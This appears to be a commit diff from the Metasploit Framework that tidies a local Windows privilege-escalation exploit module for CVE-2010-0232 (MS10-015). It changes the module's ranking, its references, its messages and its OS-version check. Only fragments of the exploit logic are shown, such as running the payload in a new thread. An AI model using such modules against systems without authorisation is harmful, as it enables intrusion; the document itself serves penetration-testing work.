Various tidies and fixes
* Change ranking. * Update references to comply with correct approach. * Update messages to better describe what should happen. * Update the Windows version regex to match XP. * Update `check` function to use `unless`. Thanks again @jvazquez-r7 for the feedback!bug/bundler_fix
parent
40f58ce534
commit
e4fc361b37
|
@ -8,10 +8,8 @@ require 'msf/core/exploit/exe'
|
|||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
# TODO: ask Juan/Sinner/Wvu what this should be
|
||||
Rank = ExcellentRanking
|
||||
Rank = GreatRanking
|
||||
|
||||
include Exploit::EXE
|
||||
include Post::File
|
||||
include Post::Windows::Priv
|
||||
|
||||
|
@ -45,9 +43,9 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'References' => [
|
||||
[ 'CVE', '2010-0232' ],
|
||||
[ 'OSVDB', '61854' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ],
|
||||
[ 'URL', 'http://technet.microsoft.com/en-us/security/bulletin/MS10-015' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/11199/' ]
|
||||
[ 'MSB', 'MS10-015' ],
|
||||
[ 'EDB', '11199' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ]
|
||||
],
|
||||
'DisclosureDate'=> "Jan 19 2010"
|
||||
))
|
||||
|
@ -62,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
# Validate OS version
|
||||
winver = sysinfo["OS"]
|
||||
if winver !~ /Windows 2000|Windows Vista|Windows 2003|Windows 2008|Windows 7/
|
||||
unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
@ -74,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
if check() == Exploit::CheckCode::Safe
|
||||
if check == Exploit::CheckCode::Safe
|
||||
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||
end
|
||||
|
||||
|
@ -115,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_status("Exploit executed. Executing payload...")
|
||||
# Finally run our payload
|
||||
host_process.thread.create(payload_mem, 0)
|
||||
print_good("Exploit successful.")
|
||||
print_good("Exploit finished, wait for a new (hopefully privileged) session.")
|
||||
end
|
||||
|
||||
protected
|
||||
|
|
Loading…
Reference in New Issue